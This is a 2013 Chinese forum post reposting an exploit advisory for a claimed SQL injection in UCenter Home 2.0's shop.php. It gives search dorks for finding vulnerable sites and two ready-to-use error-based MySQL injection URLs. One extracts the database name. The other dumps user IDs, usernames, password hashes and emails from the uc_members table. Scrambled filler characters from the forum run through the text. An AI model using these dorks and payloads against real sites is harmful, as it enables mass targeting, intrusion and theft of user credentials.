找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2139|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

6 W+ t5 f' P# K; L( F; A__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  ) x1 ?" \+ z/ O4 z2 x/ i6 r

- {+ A2 Y* `) `4 g5 k" Q2 }6 i6 m: s                                 3 t' \0 E5 u) {, |9 }8 a1 ?4 Y! ^6 T

. L- k9 V/ h  V3 u0 j0 Y*/ Author : KnocKout  
+ ~: \( T, x% I
; k1 }) s( i! j- E7 T, A' f: p/ l*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
' C% D, _! c8 j. x
+ [; |7 V9 k5 r7 S*/ Contact: knockoutr@msn.com  
4 v) _: [' S. C6 p- b6 i, C0 M5 f
. l$ ^9 B, ]+ r" r, }, Y5 S0 A4 p1 v*/ Cyber-Warrior.org/CWKnocKout  3 |8 E: A; h# ?1 t

: m( q6 y- a/ o& k__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
3 B* m! }) G3 j4 l" y/ A  @  [) m) T& J# V: N
Script : UCenter Home  # g6 b- K' L) J
9 G8 ^3 {( D3 w# D' u4 m4 N4 F' x
Version : 2.0  3 X3 P) c! H5 W! J1 d

5 ?& z& l, A& o" }Script HomePage : http://u.discuz.net/  
# {! w( B9 ~; O4 L0 @2 o5 c! m8 w3 s  D! N+ s% r+ `1 C' m+ z% ?! M( y
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  2 E+ _5 O; l; a& H/ I/ v8 p
* f; I7 q+ D% G' R8 X- h$ _( g& r( k
Dork : Powered by UCenter inurl:shop.php?ac=view  & N6 Q- h) a- ]" h7 O2 [

8 X0 b; V  A7 M3 n" r' rDork 2 : inurl:shop.php?ac=view&shopid=  
) {8 i: S" m0 t" N* _$ N5 g
/ z0 C# I1 {& i# h) a7 N) G__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  $ t0 d$ \4 ~! ]9 \1 t3 t/ s3 B

/ Z# H1 v9 l9 |Vuln file : Shop.php  
7 l3 {# x  h7 @, P6 Q; j
1 ~7 s+ n/ k8 |% J0 x& R1 i0 R9 Yvalue's : (?)ac=view&shopid=  ( N  e- l0 w1 c2 K
) X9 ?4 V$ O8 \
Vulnerable Style : SQL Injection (MySQL Error Based)  # |6 ]6 A$ }% `% D

: ?# T+ {* m  S. b  `2 C4 \Need Metarials : Hex Conversion  / Y. G0 u& u0 }9 ^0 \% j5 L

3 n" ^/ c1 ^3 d__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==    a) L* U6 J- {# U% B( s! H
* p6 j+ k' D; V0 A) m6 f8 p4 ^
Your Need victim Database name.   
+ c/ b3 P5 e6 Q4 z8 c: {
$ w" d3 N+ N3 o) N7 Y* Tfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
2 q% }& _' o1 a
: E! Z( o8 _9 b4 w..  3 k4 U/ O- q7 b, ~, f" p
1 f& B$ T: {8 `: Y' y! E2 a) t7 M
DB : Okey.  
1 r; v  j5 T, s2 A9 j* D; X' ?8 u$ T$ p" \1 b
your edit DB `[TARGET DB NAME]`  8 P+ x; }- G, B7 p) B
& l: n0 x4 i1 G2 D/ v0 o- S* `8 f
Example : 'hiwir1_ucenter'  $ k# E) V( S, L/ D7 b) t# v0 G

" u8 R$ t( C0 @; `" i. EEdit : Okey.  
) j, W7 l. [! f3 x
' x6 T7 ~; g# S4 h% MYour use Hex conversion. And edit Your SQL Injection Exploit..  
' r2 K/ J) s# Z& `4 q6 k3 U; f5 [4 |1 D" ?  T
   ! s" p. E# z# G% Y  @8 G

3 G8 z5 C/ t) y2 J2 H- ]& jExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  4 ]7 |: F; a+ g2 C& V1 N4 D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表